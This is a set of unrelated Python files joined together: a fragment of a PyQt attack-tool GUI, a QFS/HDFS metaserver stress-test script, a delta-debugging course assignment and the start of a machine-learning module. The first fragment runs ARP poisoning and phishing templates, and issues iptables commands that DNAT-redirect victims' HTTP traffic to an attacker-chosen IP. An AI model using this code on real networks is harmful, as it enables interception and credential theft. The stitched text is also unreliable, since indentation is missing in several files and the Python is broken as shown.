self.grid1.addWidget(self.btn_server,0,2)
self.grid1.addWidget(self.btn_windows_update, 0,3)
#btn
self.grid2 = QGridLayout()
self.grid2.addWidget(self.btn_Attack_Posion,1,0)
self.grid2.addWidget(self.btn_Stop_Posion,1,5)
x = self.interfaces
if x['gateway'] != None:
self.txt_gateway.setText(x['gateway'])
self.txt_redirect.setText(x['IPaddress'])
self.txt_mac.setText(Refactor.getHwAddr(x['activated']))
self.form0 = QGridLayout()
self.form0.addWidget(self.movie_screen,0,0)
self.form0.addWidget(self.tables,0,0)
self.form.addRow(self.form0)
self.form.addRow(self.grid1)
self.form.addRow('Target:', self.txt_target)
self.form.addRow('Gateway:', self.txt_gateway)
self.form.addRow('MAC address:', self.txt_mac)
self.form.addRow('Redirect IP:', self.txt_redirect)
        self.form.addRow('IP range Scan:',self.ip_range)
self.form.addRow(self.grid0)
self.form.addRow(self.grid2)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def thread_scan_reveice(self,info_ip):
self.StatusMonitor(False,'stas_scan')
self.movie_screen.setDisabled(False)
self.tables.setVisible(True)
data = info_ip.split('|')
Headers = []
self.data['IPaddress'].append(data[0])
self.data['MacAddress'].append(data[1])
self.data['Hostname'].append(data[2])
for n, key in enumerate(reversed(self.data.keys())):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
def show_frm_fake(self):
self.n = frm_update_attack()
self.n.setGeometry(QRect(100, 100, 450, 300))
self.n.show()
def emit_template(self,log):
if log == 'started':
self.StatusMonitor(True,'stas_phishing')
def show_template_dialog(self):
self.Ftemplates = frm_template()
self.connect(self.Ftemplates,SIGNAL('Activated ( QString ) '), self.emit_template)
self.Ftemplates.setWindowTitle('Templates Phishing Attack')
self.Ftemplates.txt_redirect.setText(self.txt_redirect.text())
self.Ftemplates.show()
def kill_attack(self):
for i in self.ThreadDirc['Arp_posion']:
i.stop()
for i in threadloading['template']:
i.stop(),i.join()
threadloading['template'] = []
try:
self.Ftemplates.killThread()
except:pass
chdir(self.owd)
self.StatusMonitor(False,'stas_arp')
self.StatusMonitor(False,'stas_phishing')
self.conf_attack(False)
Refactor.set_ip_forward(0)
@pyqtSlot(QModelIndex)
def check_options(self,index):
if self.check_face.isChecked():
self.check_route.setChecked(False)
self.check_gmail.setChecked(False)
elif self.check_gmail.isChecked():
self.check_face.setChecked(False)
self.check_route.setChecked(False)
else:
self.check_face.setChecked(False)
self.check_gmail.setChecked(False)
def StopArpAttack(self,data):
self.StatusMonitor(False,'stas_arp')
def Start_Attack(self):
if (len(self.txt_target.text()) and len(self.txt_mac.text()) and len(self.txt_gateway.text())) == 0:
            QMessageBox.information(self, 'Error Arp Attacker', 'You need to set the input correctly')
else:
chdir(self.owd)
if (len(self.txt_target.text()) and len(self.txt_gateway.text())) and len(self.txt_mac.text()) != 0:
if len(self.txt_redirect.text()) != 0:
self.StatusMonitor(True,'stas_arp')
Refactor.set_ip_forward(1)
self.conf_attack(True)
thr = ThreadAttackPosion(str(self.txt_target.text()),
str(self.txt_gateway.text()),
str(self.txt_mac.text()))
self.connect(thr,SIGNAL('Activated ( QString ) '), self.StopArpAttack)
                    thr.setObjectName('Arp Poison')
self.ThreadDirc['Arp_posion'].append(thr)
thr.start()
def conf_attack(self,bool_conf):
if bool_conf:
self.ip = self.txt_redirect.text()
if len(self.ip) != 0:
iptables = [
'iptables -t nat --flush',
'iptables -A FORWARD --in-interface '+str(self.txt_gateway.text())+' -j ACCEPT',
'iptables -t nat --append POSTROUTING --out-interface ' +self.interfaces['activated'] +' -j MASQUERADE',
'iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination '+self.ip
]
for i in iptables:
try:system(i)
except:pass
else:
QMessageBox.information(self,'Error Redirect IP','Redirect IP not found')
else:
nano = [
'iptables --flush',
'iptables --table nat --flush' ,\
'iptables --delete-chain', 'iptables --table nat --delete-chain'
]
for delete in nano: popen(delete)
def Start_scan(self):
self.StatusMonitor(True,'stas_scan')
threadscan_check = self.configure.xmlSettings('advanced','Function_scan',None,False)
self.tables.clear()
self.data = {'IPaddress':[], 'Hostname':[], 'MacAddress':[]}
if threadscan_check == 'Nmap':
try:
from nmap import PortScanner
except ImportError:
                QMessageBox.information(self,'Error Nmap','The python-nmap module is not installed')
return
if self.txt_gateway.text() != '':
self.movie_screen.setDisabled(True)
self.tables.setVisible(False)
config_gateway = str(self.txt_gateway.text())
scan = ''
config_gateway = config_gateway.split('.')
del config_gateway[-1]
for i in config_gateway:
scan += str(i) + '.'
self.ThreadScanner = ThreadScan(scan + '0/24')
self.connect(self.ThreadScanner,SIGNAL('Activated ( QString ) '), self.thread_scan_reveice)
self.StatusMonitor(True,'stas_scan')
self.ThreadScanner.start()
else:
QMessageBox.information(self,'Error in gateway','gateway not found.')
elif threadscan_check == 'Ping':
if self.txt_gateway.text() != '':
config = str(self.txt_gateway.text())
t = threading.Thread(target=self.scanner_network,args=(config,))
t.daemon = True
t.start(),t.join()
self.StatusMonitor(False,'stas_scan')
else:
QMessageBox.information(self,'Error in gateway','gateway not found.')
else:
QMessageBox.information(self,'Error on select thread Scan','thread scan not selected.')
def working(self,ip,lista):
with open(devnull, 'wb') as limbo:
result=subprocess.Popen(['ping', '-c', '1', '-n', '-W', '1', ip],
stdout=limbo, stderr=limbo).wait()
if not result:
print('online',ip)
lista[ip] = ip + '|' + self.module_network.get_mac(ip)
def scanner_network(self,gateway):
scan = ''
config_gateway = gateway.split('.')
del config_gateway[-1]
for i in config_gateway:
scan += str(i) + '.'
gateway = scan
ranger = str(self.ip_range.text()).split('-')
jobs = []
manager = Manager()
on_ips = manager.dict()
for n in xrange(int(ranger[0]),int(ranger[1])):
ip='%s{0}'.format(n)%(gateway)
p = Process(target=self.working,args=(ip,on_ips))
jobs.append(p)
p.start()
for i in jobs: i.join()
for i in on_ips.values():
Headers = []
n = i.split('|')
self.data['IPaddress'].append(n[0])
self.data['MacAddress'].append(n[1])
self.data['Hostname'].append('<unknown>')
for n, key in enumerate(reversed(self.data.keys())):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
def Stop_scan(self):
self.ThreadScanner.terminate()
self.StatusMonitor(False,'stas_scan')
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.tables.setVisible(True)
def StatusMonitor(self,bool,wid):
if bool and wid == 'stas_scan':
self.txt_status_scan.setText('[ ON ]')
self.txt_status_scan.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_scan':
self.txt_status_scan.setText('[ OFF ]')
self.txt_status_scan.setStyleSheet('QLabel { color : red; }')
elif bool and wid == 'stas_arp':
self.txt_statusarp.setText('[ ON ]')
self.txt_statusarp.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_arp':
self.txt_statusarp.setText('[ OFF ]')
self.txt_statusarp.setStyleSheet('QLabel { color : red; }')
elif bool and wid == 'stas_phishing':
self.txt_status_phishing.setText('[ ON ]')
self.txt_status_phishing.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_phishing':
self.txt_status_phishing.setText('[ OFF ]')
self.txt_status_phishing.setStyleSheet('QLabel { color : red; }')
@pyqtSlot(QModelIndex)
def list_clicked_scan(self, index):
item = self.tables.selectedItems()
if item != []:
self.txt_target.setText(item[0].text())
else:
self.txt_target.clear()
|
|
#!/usr/bin/env python
# $Id$
#
# Author: Thilee Subramaniam
#
# Copyright 2012 Quantcast Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# This program invokes given number of client processes on the given set of
# remote clients (Java and C++) and makes use of the plan file to apply load
# on the DFS server.
import optparse
import sys
import subprocess
import time
import os
import signal
import datetime
import commands
import resource
import re
class Globals:
MASTER_PATH = ''
SLAVE_PATH = ''
SLAVE_BASE_DIR = ''
CLIENT_PATH = ''
MSTRESS_LOCK = '/tmp/mstress_master.lock'
SIGNALLED = False
SERVER_CMD = ""
SERVER_KEYWORD = ""
KFS_SERVER_CMD = "metaserver"
KFS_SERVER_KEYWORD = "metaserver"
HDFS_SERVER_CMD = "java"
HDFS_SERVER_KEYWORD = "NameNode"
def ParseCommandline():
parser = optparse.OptionParser()
parser.add_option('-m', '--mode',
action='store',
default='master',
type='string',
help='Run as master or slave')
parser.add_option('-f', '--filesystem',
action='store',
default=None,
type='string',
help='Filesystem whose metaserver to test. qfs or hdfs.')
parser.add_option('-s', '--server',
action='store',
default=None,
type='string',
help='Metaserver or Namenode hostname.')
parser.add_option('-p', '--port',
action='store',
default=None,
type='int',
help='Metaserver or Namenode port')
parser.add_option('-c', '--client-hostname',
action='store',
default=None,
type='string',
help='mstress slave\'s hostname (slave only option).')
parser.add_option('-k', '--client-lookup-key',
action='store',
default=None,
type='string',
help='mstress slave\'s lookup key to be used (slave only option).')
parser.add_option('-t', '--client-testname',
action='store',
default=None,
type='string',
help='Test to run on mstress slave (slave only option).')
parser.add_option('-a', '--plan',
action='store',
default='%s/plan/plan' % (os.path.dirname(os.path.realpath(__file__))),
type='string',
help='Plan file containing client instructions in the client.')
parser.add_option('-l', '--leave-files', action='store_true',
default=False, help='Leave files. Does not perform delete test.')
opts, args = parser.parse_args()
if args:
sys.exit('Unexpected arguments: %s.' % str(args))
if not opts.filesystem or not opts.server or not opts.port:
sys.exit('Missing mandatory arguments.')
if opts.mode not in ('master', 'slave'):
sys.exit('Invalid mode.')
if opts.mode == 'master':
# master should not have -c option
if opts.client_hostname is not None:
sys.exit('Master: does not support -c option.')
if opts.client_testname is not None:
sys.exit('Master: does not support -t option.')
else:
# for slave, this is the slave host name.
hosts = opts.client_hostname.split(',')
if len(hosts) != 1:
sys.exit('Slave: Error in client host name.')
if opts.client_testname is None or opts.client_lookup_key is None:
sys.exit('Slave: Error in client test name or lookup key.')
return opts
def PrintMemoryUsage(opts):
if sys.platform in ('Darwin', 'darwin'):
psCmd = "ps -o rss,pid,command | grep %s | grep %s | grep -v grep | awk '{print $1}'" % (Globals.SERVER_CMD, Globals.SERVER_KEYWORD)
else:
psCmd = "ps -C %s -o rss,pid,cmd | grep %s | awk '{print $1}'" % (Globals.SERVER_CMD, Globals.SERVER_KEYWORD)
proc = subprocess.Popen(['ssh', opts.server, psCmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
result = proc.communicate()
if result and len(result[0].strip()) > 0:
print "Memory usage %sKB" % result[0].strip()
else:
print "Memory usage <unknown> KB"
def RunMStressMaster(opts, hostsList):
""" Called when run in master mode. Calls master funcions for 'create',
'stat', and 'readdir'.
Args:
    opts: options object, from parsed commandline options.
hostsList: list of hosts obtained from plan file.
Returns:
True on success. False on failure.
"""
# print 'Master: called with %r, %r' % (opts, hostsList)
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'create_write') == False:
return False
deltaTime = datetime.datetime.now() - startTime
  print '\nMaster: Create & Write test took %d.%06d sec' % (deltaTime.seconds, deltaTime.microseconds)
PrintMemoryUsage(opts)
print '=========================================='
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'stat') == False:
return False
deltaTime = datetime.datetime.now() - startTime
  print '\nMaster: Stat test took %d.%06d sec' % (deltaTime.seconds, deltaTime.microseconds)
print '=========================================='
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'readdir') == False:
return False
deltaTime = datetime.datetime.now() - startTime
  print '\nMaster: Readdir test took %d.%06d sec' % (deltaTime.seconds, deltaTime.microseconds)
print '=========================================='
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'read') == False:
return False
deltaTime = datetime.datetime.now() - startTime
  print '\nMaster: Read test took %d.%06d sec' % (deltaTime.seconds, deltaTime.microseconds)
print '=========================================='
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'rename') == False:
return False
deltaTime = datetime.datetime.now() - startTime
  print '\nMaster: Rename test took %d.%06d sec' % (deltaTime.seconds, deltaTime.microseconds)
print '=========================================='
if opts.leave_files:
print "\nNot Renaming files because of -l option"
return False
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'delete') == False:
return False
deltaTime = datetime.datetime.now() - startTime
  print '\nMaster: Delete test took %d.%06d sec' % (deltaTime.seconds, deltaTime.microseconds)
print '=========================================='
PrintStatsFromClients(hostsList, opts)
return True
def PrintStatsFromClients(hostsList, opts):
"""
Called at the end of benchmarking. This function ssh's into each of the
client hosts and greps the client logs for benchmark lines inserted by the
  MStress_Client.
Args:
opts: options object, from parsed commandline options.
hostsList: list of hosts obtained from plan file.
"""
# kick off grepping the log files in the client hosts
running_procs = []
for host in hostsList:
p = subprocess.Popen(['/usr/bin/ssh', host,
"grep -e '\\[benchmark\\]' %s/plan/*client.log | cut -d' ' \
-f 2,3" % (Globals.SLAVE_BASE_DIR)],
stdout=subprocess.PIPE)
running_procs.append(p)
# mapping from call (str) -> list of timings (float)
# we maintain all the latencies in this dictionary -> list mapping
timings = {}
for proc in running_procs:
# block until that ssh child is done, and then read out its standard out.
out, err = proc.communicate()
if out:
# the lines are of the form:
# create_write: 0.023874,0.26489 ...
# rename: 0.005003 ...
# parse and bucket them into the timings dictionary
for line in out.split('\n'):
if ' ' not in line:
continue
(call, latencies) = line.split(' ', 1)
latencies = latencies.strip()
if latencies == '':
continue
if call not in timings:
timings[call] = []
timings[call].extend(map(lambda x: float(x), latencies.split(',')))
# for each of the calls, compute the metrics and print them out
for call in timings:
timings[call].sort()
total = sum(timings[call])
if total > 0:
avg = total/len(timings[call])
else:
avg = 0
print "%s num=%d, sum=%f, avg=%f, p50=%f, p90=%f" % (call,
len(timings[call]),
total,
avg,
pct(timings[call], 50),
pct(timings[call], 90))
def pct(l, p):
""" returns the `p`-th percentile element in a sorted list `l`"""
  return l[min(len(l) - 1, int((p / 100.0) * len(l)))]
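# A quick illustration of pct() on a sorted latency list (made-up numbers):
# for a 10-element list, pct(l, 50) picks index int(0.5 * 10) == 5 and
# pct(l, 90) picks index int(0.9 * 10) == 9.
#
#   latencies = sorted([0.01, 0.02, 0.02, 0.03, 0.05, 0.05, 0.07, 0.09, 0.12, 0.30])
#   pct(latencies, 50)   # -> 0.05
#   pct(latencies, 90)   # -> 0.30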
def RunMStressMasterTest(opts, hostsList, test):
""" Called when run in master mode. Invokes the slave version of the same
program on the provided hosts list with the given test name.
Args:
opts: parsed commandline options.
hostsList: list of hosts obtained from plan file.
test: string: test name to call.
Returns:
False on error, True on success
"""
if Globals.SIGNALLED:
return False
# invoke remote master client.
ssh_cmd = '%s -m slave -f %s -s %s -p %d -t %s' % (
Globals.SLAVE_PATH,
opts.filesystem,
opts.server,
opts.port,
test)
clientHostMapping = MapHostnameForTest(hostsList, test)
running_procs = {}
for client in hostsList:
slaveLogfile = Globals.SLAVE_BASE_DIR + '/plan/plan_' + client + '_' + test + '_' + opts.filesystem + '.slave.log'
p = subprocess.Popen(['/usr/bin/ssh', client,
'%s -c %s -k %s >& %s' % (ssh_cmd, client, clientHostMapping[client], slaveLogfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
running_procs[p] = client
success = True
isLine1 = True
while running_procs:
tobedelkeys = []
for proc in running_procs.iterkeys():
client = running_procs[proc]
retcode = proc.poll()
if retcode is not None:
sout,serr = proc.communicate()
if sout:
print '\nMaster: output of slave (%s):%s' % (client, sout)
if serr:
print '\nMaster: err of slave (%s):%s' % (client, serr)
tobedelkeys.append(proc)
if retcode != 0:
print "\nMaster: '%s' test failed. Please make sure test directory is empty and has write permission, or check slave logs." % test
success = False
else:
if Globals.SIGNALLED:
proc.terminate()
for k in tobedelkeys:
del running_procs[k]
if running_procs:
if isLine1:
sys.stdout.write('Master: remote slave running \'%s\'' % test)
isLine1 = False
else:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(0.5)
return success
def MapHostnameForTest(clients, test):
""" Determines the '-c' argument to use for slave invocation. This argument
is passed to the C++/Java client so that the client can use it as a key
to read the plan file.
For 'create', this name is the same as the client name. But for doing
a 'stat' or a 'readdir' we want to run the tests on a client different
from the one that created the path.
Args:
clients: list of strings, clients.
test: string, the name of the test.
Returns:
map of strings, client name to '-c' argument.
"""
mapping = {}
length = len(clients)
for i in range(0, length):
if test == 'stat' or test == 'readdir' or test == 'read':
mapping[clients[i]] = clients[(i+1)%length]
else:
mapping[clients[i]] = clients[i]
return mapping
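# For example (hypothetical host names), with clients = ['host1', 'host2', 'host3']:
#   MapHostnameForTest(clients, 'create_write')
#       -> {'host1': 'host1', 'host2': 'host2', 'host3': 'host3'}
#   MapHostnameForTest(clients, 'stat')
#       -> {'host1': 'host2', 'host2': 'host3', 'host3': 'host1'}
# so 'stat', 'readdir' and 'read' exercise paths created by a *different* client.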
def RunMStressSlave(opts, clientsPerHost):
""" Called when the code is run in slave mode, on each slave.
Invokes number of client processes equal to 'clientsPerHost'.
Args:
opts: parsed commandline options.
clientsPerHost: integer, number of processes to run on each host.
Returns:
True if client returns success. False otherwise.
"""
print 'Slave: called with %r, %d' % (opts, clientsPerHost)
os.putenv('KFS_CLIENT_DEFAULT_FATTR_REVALIDATE_TIME',"-1")
running_procs = []
for i in range(0, clientsPerHost):
clientLogfile = '%s_%s_proc_%02d_%s_%s.client.log' % (opts.plan, opts.client_hostname, i, opts.client_testname, opts.filesystem)
args = ["%s -s %s -p %s -a %s -c %s -t %s -n proc_%02d >& %s" % (
Globals.CLIENT_PATH,
opts.server,
str(opts.port),
opts.plan,
opts.client_lookup_key,
opts.client_testname,
i,
clientLogfile)]
print 'Slave: args = %r' % args
p = subprocess.Popen(args,
shell=True,
executable='/bin/bash',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
running_procs.append(p)
success = True
isLine1 = True
while running_procs:
    for proc in running_procs[:]:  # iterate over a copy; finished procs are removed below
ret = proc.poll()
if ret is not None:
sout,serr = proc.communicate()
if sout:
print '\nSlave: output of (ClientHost %s, ClientNo %r):%s' % (opts.client_hostname, proc, sout)
if serr:
print '\nSlave: err of (ClientHost %s, ClientNo %r):%s' % (opts.client_hostname, proc, serr)
running_procs.remove(proc)
if ret != 0:
print '\nSlave: mstress client failed. Please check client logs.'
success = False
else:
if Globals.SIGNALLED:
proc.terminate()
if running_procs:
if isLine1:
sys.stdout.write('Slave: load client \'%s\' running' % opts.client_testname)
isLine1 = False
else:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(0.5)
return success
def ReadPlanFile(opts):
""" Reads the given plan file to extract the list of client-hosts and
process-count per client-host.
Args:
opts: parsed commandline options.
Returns:
hostslist: list of client host names
clientsPerHost: integer: client processes per client host.
"""
hostsList = None
clientsPerHost = None
leafType = None
numLevels = None
numToStat = None
nodesPerLevel = None
planfile = open(opts.plan, 'r')
for line in planfile:
if line.startswith('#'):
continue
if line.startswith('hostslist='):
hostsList = line[len('hostslist='):].strip().split(',')
elif line.startswith('clientsperhost='):
clientsPerHost = int(line[len('clientsperhost='):].strip())
elif line.startswith('type='):
leafType = line[len('type='):].strip()
elif line.startswith('levels='):
numLevels = int(line[len('levels='):].strip())
elif line.startswith('nstat='):
numToStat = int(line[len('nstat='):].strip())
elif line.startswith('inodes='):
nodesPerLevel = int(line[len('inodes='):].strip())
planfile.close()
if None in (hostsList, clientsPerHost, leafType, numLevels, numToStat, nodesPerLevel):
sys.exit('Failed to read plan file')
nodesPerProcess = 0
leafNodesPerProcess = 0
for l in range(1,numLevels+1):
nodesPerProcess += pow(nodesPerLevel,l)
if l == numLevels:
leafNodesPerProcess = pow(nodesPerLevel,l)
inters = nodesPerProcess - leafNodesPerProcess
overallNodes = nodesPerProcess * len(hostsList) * clientsPerHost
overallLeafs = leafNodesPerProcess * len(hostsList) * clientsPerHost
intermediateNodes = inters * len(hostsList) * clientsPerHost + len(hostsList) * clientsPerHost + 1
totalNumToStat = numToStat * len(hostsList) * clientsPerHost
print ('Plan:\n' +
' o %d client processes on each of %d hosts will generate load.\n' % (clientsPerHost, len(hostsList)) +
' o %d levels of %d nodes (%d leaf nodes, %d total nodes) will be created by each client process.\n' % (numLevels, nodesPerLevel, leafNodesPerProcess, nodesPerProcess) +
' o Overall, %d leaf %ss will be created, %d intermediate directories will be created.\n' % (overallLeafs, leafType, intermediateNodes))
return hostsList, clientsPerHost
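# ReadPlanFile() expects key=value lines like the hypothetical plan below
# (lines starting with '#' are ignored):
#
#   hostslist=host1,host2
#   clientsperhost=4
#   type=file
#   levels=2
#   inodes=100
#   nstat=10
#
# With these numbers each client process creates 100 + 100*100 = 10100 nodes,
# so 2 hosts x 4 processes would create 8 * 10100 = 80800 nodes overall.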
def SetGlobalPaths(opts):
if opts.mode == 'master':
mydir = os.path.dirname(os.path.realpath(__file__))
Globals.MASTER_PATH = os.path.join(mydir, 'mstress.py')
Globals.SLAVE_BASE_DIR = '/tmp/%s' % os.path.basename(mydir)
mydir = '/tmp/%s' % os.path.basename(os.path.dirname(os.path.realpath(__file__)))
Globals.SLAVE_PATH = os.path.join(mydir, 'mstress.py')
Globals.SLAVE_BASE_DIR = mydir
if opts.filesystem == 'qfs':
Globals.CLIENT_PATH = os.path.join(mydir, 'mstress_client')
Globals.SERVER_CMD = Globals.KFS_SERVER_CMD
Globals.SERVER_KEYWORD = Globals.KFS_SERVER_KEYWORD
elif opts.filesystem == 'hdfs':
hdfsjars = commands.getoutput("echo %s/mstress_hdfs_client_jars/*.jar | sed 's/ /:/g'" % mydir)
Globals.CLIENT_PATH = 'java -Xmx256m -cp %s:%s MStress_Client' % (mydir,hdfsjars)
Globals.SERVER_CMD = Globals.HDFS_SERVER_CMD
Globals.SERVER_KEYWORD = Globals.HDFS_SERVER_KEYWORD
else:
sys.exit('Invalid filesystem option')
def CreateLock(opts):
if opts.mode != 'master':
return
if os.path.exists(Globals.MSTRESS_LOCK):
sys.exit('Program already running. Please wait till it finishes')
f = open(Globals.MSTRESS_LOCK, 'w')
f.write(str(os.getpid()))
f.close()
def RemoveLock(opts):
if opts.mode != 'master':
return
if os.path.exists(Globals.MSTRESS_LOCK):
f = open(Globals.MSTRESS_LOCK, 'r')
pid = f.read()
f.close()
if int(pid) == os.getpid():
os.unlink(Globals.MSTRESS_LOCK)
def HandleSignal(signum, frame):
print "Received signal, %d" % signum
Globals.SIGNALLED = True
def main():
signal.signal(signal.SIGTERM, HandleSignal)
signal.signal(signal.SIGINT, HandleSignal)
signal.signal(signal.SIGHUP, HandleSignal)
opts = ParseCommandline()
SetGlobalPaths(opts)
CreateLock(opts)
try:
(hostsList,clientsPerHost) = ReadPlanFile(opts)
if opts.mode == 'master':
return RunMStressMaster(opts, hostsList)
else:
return RunMStressSlave(opts, clientsPerHost)
finally:
RemoveLock(opts)
if __name__ == '__main__':
success = main()
if success:
sys.exit(0)
else:
sys.exit(1)
|
|
#!/usr/bin/env python
# INSTRUCTIONS
# Your task for this assignment is to combine the principles that you learned
# in units 3, 4 and 5 and create a fully automated program that can display
# the cause-effect chain without any manual guidance.
# In problem set 4 you created a program that generated a cause chain
# if you provided it the locations (line and iteration number) to look at.
# That is not very useful: if you already know which lines to inspect for
# changes, you already know a lot about the cause. Instead, with the help of concepts
# introduced in unit 5 (line coverage), improve this program to create
# the locations list automatically, and then use it to print out only the
# failure-inducing lines, as before.
# See some hints at the provided functions, and an example output at the end.
import sys
import copy
#buggy program
def remove_html_markup(s):
tag = False
quote = False
out = ""
for c in s:
if c == '<' and not quote:
tag = True
elif c == '>' and not quote:
tag = False
elif c == '"' or c == "'" and tag:
quote = not quote
elif not tag:
out = out + c
return out
def ddmin(s):
    # you may need to use this to test whether the values you pass actually
    # make the test fail.
assert test(s) == "FAIL"
n = 2 # Initial granularity
while len(s) >= 2:
start = 0
subset_length = len(s) / n
some_complement_is_failing = False
while start < len(s):
complement = s[:start] + s[start + subset_length:]
if test(complement) == "FAIL":
s = complement
n = max(n - 1, 2)
some_complement_is_failing = True
break
start += subset_length
if not some_complement_is_failing:
if n == len(s):
break
n = min(n * 2, len(s))
return s
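# ddmin() above is the classic delta-debugging minimizer: it repeatedly drops
# chunks of the failing input, keeps any smaller input that still fails, and
# doubles the granularity only when no chunk can be dropped. A standalone
# sketch (assuming a test() that reports FAIL whenever '8' is present; in this
# assignment ddmin is applied to the list of variable differences instead):
#
#   def test(s): return "FAIL" if '8' in s else "PASS"
#   ddmin("12345678")   # -> "8", a 1-minimal failure-inducing input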
# Use this function to record the covered lines in the program, in order of
# their execution and save in the list coverage
coverage = []
def traceit(frame, event, arg):
global coverage
# YOUR CODE HERE
if event == 'line':
coverage.append(frame.f_lineno)
return traceit
# We use these variables to communicate between callbacks and drivers
the_line = None
the_iteration = None
the_state = None
the_diff = None
the_input = None
# Stop at THE_LINE/THE_ITERATION and store the state in THE_STATE
def trace_fetch_state(frame, event, arg):
global the_line
global the_iteration
global the_state
if frame.f_lineno == the_line:
the_iteration = the_iteration - 1
if the_iteration == 0:
the_state = copy.deepcopy(frame.f_locals)
the_line = None # Don't get called again
return None # Don't get called again
return trace_fetch_state
# Get the state at LINE/ITERATION
def get_state(input, line, iteration):
global the_line
global the_iteration
global the_state
the_line = line
the_iteration = iteration
sys.settrace(trace_fetch_state)
y = remove_html_markup(input)
sys.settrace(None)
return the_state
# Stop at THE_LINE/THE_ITERATION and apply the differences in THE_DIFF
def trace_apply_diff(frame, event, arg):
global the_line
global the_diff
global the_iteration
if frame.f_lineno == the_line:
the_iteration = the_iteration - 1
if the_iteration == 0:
frame.f_locals.update(the_diff)
the_line = None
return None # Don't get called again
return trace_apply_diff
# Testing function: Call remove_html_output, stop at THE_LINE/THE_ITERATION,
# and apply the diffs in DIFFS at THE_LINE
def test(diffs):
global the_diff
global the_input
global the_line
global the_iteration
line = the_line
iteration = the_iteration
the_diff = diffs
sys.settrace(trace_apply_diff)
y = remove_html_markup(the_input)
sys.settrace(None)
the_line = line
the_iteration = iteration
if y.find('<') == -1:
return "PASS"
else:
return "FAIL"
def make_locations(coverage):
# YOUR CODE HERE
# This function should return a list of tuples in the format
# [(line, iteration), (line, iteration) ...], as auto_cause_chain
# expects.
locations = []
save_line = {}
for line in coverage:
if line not in save_line:
save_line[line] = 0
locations.append((line, save_line[line]+1))
save_line[line] = save_line[line] + 1
return locations
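# For instance, if the recorded coverage were [8, 9, 10, 11, 12, 11, 12], this
# returns [(8, 1), (9, 1), (10, 1), (11, 1), (12, 1), (11, 2), (12, 2)]:
# each (line, iteration) pair names the k-th time that line was executed.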
def auto_cause_chain(locations):
global html_fail, html_pass, the_input, the_line, the_iteration, the_diff
print "The program was started with", repr(html_fail)
# Test over multiple locations
last_cause = []
for (line, iteration) in locations:
# Get the passing and the failing state
state_pass = get_state(html_pass, line, iteration)
state_fail = get_state(html_fail, line, iteration)
if state_pass == None or state_fail == None:
continue
# Compute the differences
diffs = []
for var in state_fail.keys():
if not state_pass.has_key(var) or state_pass[var] != state_fail[var]:
diffs.append((var, state_fail[var]))
# Minimize the failure-inducing set of differences
# Since this time you have all the covered lines and iterations in
# locations, you will have to figure out how to automatically detect
# which lines/iterations are the ones that are part of the
# failure chain and print out only these.
the_input = html_pass
the_line = line
the_iteration = iteration
# You will have to use the following functions and output formatting:
# cause = ddmin(diffs)
# # Pretty output
# print "Then", var, "became", repr(value)
if diffs != [] and test(diffs) == 'FAIL':
cause = ddmin(diffs)
if cause != last_cause:
for var, val in cause:
print "Then", var, "became", repr(val)
last_cause = cause
print "Then the program failed."
###### Testing runs
# We will test your function with different strings and on a different function
html_fail = '"<b>foo</b>"'
html_pass = "'<b>foo</b>'"
# This will fill the coverage variable with all lines executed in a
# failing run
coverage = []
sys.settrace(traceit)
remove_html_markup(html_fail)
sys.settrace(None)
#print coverage
locations = make_locations(coverage)
#print locations
auto_cause_chain(locations)
# The coverage :
# [8, 9, 10, 11, 12, 14, 16, 17, 11, 12... # and so on
# The locations:
# [(8, 1), (9, 1), (10, 1), (11, 1), (12, 1)... # and so on
# The output for the current program and test strings should look like follows:
"""
The program was started with '"<b>foo</b>"'
Then s became '"<b>foo</b>"'
Then c became '"'
Then quote became True
...
"""
|
|
"""Learn to estimate functions from examples. (Chapters 18-20)"""
from . utils import *
import copy
import heapq
import math
import random
from collections import defaultdict
#______________________________________________________________________________
def rms_error(predictions, targets):
return math.sqrt(ms_error(predictions, targets))
def ms_error(predictions, targets):
return mean([(p - t)**2 for p, t in zip(predictions, targets)])
def mean_error(predictions, targets):
return mean([abs(p - t) for p, t in zip(predictions, targets)])
def mean_boolean_error(predictions, targets):
return mean([(p != t) for p, t in zip(predictions, targets)])
#______________________________________________________________________________
class DataSet:
"""A data set for a machine learning problem. It has the following fields:
d.examples A list of examples. Each one is a list of attribute values.
d.attrs A list of integers to index into an example, so example[attr]
gives a value. Normally the same as range(len(d.examples[0])).
d.attrnames Optional list of mnemonic names for corresponding attrs.
d.target The attribute that a learning algorithm will try to predict.
By default the final attribute.
d.inputs The list of attrs without the target.
d.values A list of lists: each sublist is the set of possible
values for the corresponding attribute. If initially None,
it is computed from the known examples by self.setproblem.
